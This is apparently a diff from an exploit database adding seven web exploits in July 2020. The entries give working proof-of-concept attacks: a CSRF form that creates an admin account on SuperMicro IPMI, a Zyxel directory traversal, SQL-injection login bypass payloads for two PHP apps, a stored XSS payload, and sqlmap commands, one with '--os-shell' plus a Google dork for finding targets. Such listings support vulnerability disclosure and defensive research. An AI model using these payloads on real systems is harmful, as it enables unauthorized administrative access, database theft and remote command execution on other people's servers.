DB: 2020-07-16

8 changes to exploits/shellcodes

SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
Zyxel Armor X1 WAP6806 - Directory Traversal
Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
Online Polling System 1.0 - Authentication Bypass
Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
Infor Storefront B2B 1.0 - 'usr_name' SQL Injection

exploits/hardware/webapps/48668.txt

@@ -0,0 +1,28 @@
+# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Metin Yunus Kandemir
+# Date: 2020-07-15
+# Vendor Homepage: https://www.supermicro.com/
+# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
+# CVE: CVE-2020-15046
+# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
+
+# Description:
+# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
+# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
+# The fixed versions are BIOS 3.2 and firmware 03.88.
+
+# PoC :
+
+<html>
+<!-- CSRF PoC - generated by Burp Suite Professional -->
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
+<input type="hidden" name="username" value="JOKER" />
+<input type="hidden" name="original&#95;username" value="2" />
+<input type="hidden" name="password" value="onebadday" />
+<input type="hidden" name="new&#95;privilege" value="4" />
+<input type="submit" value="submit request" />
+</form>
+</body>
+</html>

exploits/hardware/webapps/48669.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
+# Date: 2020-06-19
+# Exploit Author: Rajivarnan R
+# Vendor Homepage: https://www.zyxel.com/
+# Software [http://www.zyxelguard.com/WAP6806.asp]
+# Version: [V1.00(ABAL.6)C0]
+# CVE: 2020-14461
+# Tested on: Linux Mint / Windows 10
+# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
+
+# As a result of the research, one vulnerability identified. 
+# (Directory Traversal)
+# Technical information is provided below step by step.
+
+# [1] - Directory Traversal Vulnerability
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]
+
+# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
+<https://target/Zyxel/images/eaZy/>

exploits/php/webapps/48626.txt

@@ -6,6 +6,7 @@
 # Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip
 # Version: 1.0
 # Tested on: Windows 10
+# CVE: CVE-2020-15599
 
 Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting
 

exploits/php/webapps/48670.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
+# Date: 2020-06-17
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Vendor Homepage: https://joomsky.com/
+# Software Link: https://joomsky.com/products/js-jobs-pro.html
+# Change Log (Update) : https://joomsky.com/products/js-jobs.html
+# Version: 1.3.0
+# Tested on: Kali Linux - Apache2
+
+Vulnerable param: sortby
+-------------------------------------------------------------------------
+POST /joomla/administrator/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/joomla/administrator/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 233
+Connection: close
+Cookie: COOKIES
+Upgrade-Insecure-Requests: 1
+
+js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
+
+
+-------------------------------------------------------------------------
+sqlmap poc:
+
+sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby
+
+
+Mehmet KELEPÇE
+
+Penetration Tester | Red Team

exploits/php/webapps/48671.txt

@@ -0,0 +1,46 @@
+# Exploit Title: Online Polling System 1.0 - Authentication Bypass
+# Date: 2020-07-20
+# Author: AppleBois
+# Version: NULL
+# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
+#
+# Administration Control Panel || Authentication Bypass
+# Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php
+#
+######################################################################################
+#Vulnerable Code
+#
+#$myusername=$_POST['myusername'];
+#$mypassword=$_POST['mypassword'];
+#$encrypted_mypassword=md5($mypassword);
+#
+#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
+#
+#$count=mysqli_num_rows($result);
+#
+#if($count==1){
+#
+#$user = mysqli_fetch_assoc($result);
+#$_SESSION['member_id'] = $user['member_id'];
+#header("location:student.php");
+#}
+#
+######################################################################################
+
+
+POST /admin/checklogin.php HTTP/1.1
+Host: 10.10.10.2:81
+Content-Length: 53
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.10.2:81
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.10.2:81/online/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
+Connection: close
+
+myusername=' or 1=1#&mypassword=ad&Submit=Login

exploits/php/webapps/48672.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
+# Date: 2020-07-03
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
+# Software Link: https://github.com/mrzulkarnine/Web-based-hotel-
+booking-system
+# Version: 0.1.0
+# Tested on: Kali Linux
+
+Source code(localhost/admin/loginauth.php):
+                   <?php
+                        session_start();
+
+                         $_SESSION['username'] = $_POST['username'];
+                         $_SESSION['password'] =  $_POST['password'];
+
+                         include './auth.php';
+                         $re = mysql_query("select * from user where
+username = '".$_SESSION['username']."'  AND password =
+'".$_SESSION['password']."' " );
+echo mysql_error();
+                        if(mysql_num_rows($re) > 0)
+                          {
+                            header('Refresh: 0;url=dashboard.php');
+                           }
+                       else
+                          {
+
+                             session_destroy();
+                             header("location: index.htm");
+                           }
+                           ?>
+
+Payload:
+       Username: 1' or 1 = 1 LIMIT 1#
+       Password: 1' or 1 = 1 LIMIT 1#

exploits/php/webapps/48673.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
+# Date: 2020-06-29
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage:  https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
+# Software Link:  https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
+# Version: 0.1.0
+# Tested on: Kali Linux
+
+Source code(review.php):
+<?php
+if($result) :
+while($row1 = $result->fetch_array()) :
+?>
+  <div class="con">
+  <div class="row">
+  <div class="col-sm-4">
+  <em style="color: black;"><?= $row1['comment']; ?></em>
+</div>
+
+
+POC:
+
+1. http://192.168.1.58/a/review.php?pid=31 go
+2. We send the payload (<script>alert(1)</script>)
+3. Write a review payload and submit
+4. And refresh the page

exploits/php/webapps/48674.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
+# Google Dork: inurl:storefrontb2bweb
+# Date: 2020-06-27
+# Exploit Author: ratboy
+# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
+# Version: Infor Storefront
+# Tested on: Windows All Versions
+
+[POC Multiple Vulns]
+
+python sqlmap.py -u
+"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
+-p usr_name --dbms=mssql --level=5 --risk=3
+--tamper=between,space2comment -o --random-agent --parse-errors
+--os-shell --technique=ES
+
+
+python sqlmap.py -u
+"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
+-p itm_id --dbms=mssql --level=5 --risk=3
+--tamper=between,space2comment -o --random-agent --parse-errors
+--os-shell --technique=ES
+
+
+or...
+
+http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
+INJECTION];--
+
+http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
+INJECTION];--
+
+
+
+-- 
+Sincerly,
+Aaron Schrom

files_exploits.csv

@@ -42915,3 +42915,10 @@ id,file,description,date,author,type,platform,port
 48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0  - Authentication Bypass",2020-07-13,gh1mau,webapps,php,
 48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,
 48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,
+48668,exploits/hardware/webapps/48668.txt,"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-15,"Metin Yunus Kandemir",webapps,hardware,
+48669,exploits/hardware/webapps/48669.txt,"Zyxel Armor X1 WAP6806 - Directory Traversal",2020-07-15,"Rajivarnan R",webapps,hardware,
+48670,exploits/php/webapps/48670.txt,"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection",2020-07-15,"Mehmet Kelepçe",webapps,php,
+48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,
+48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
+48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
+48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,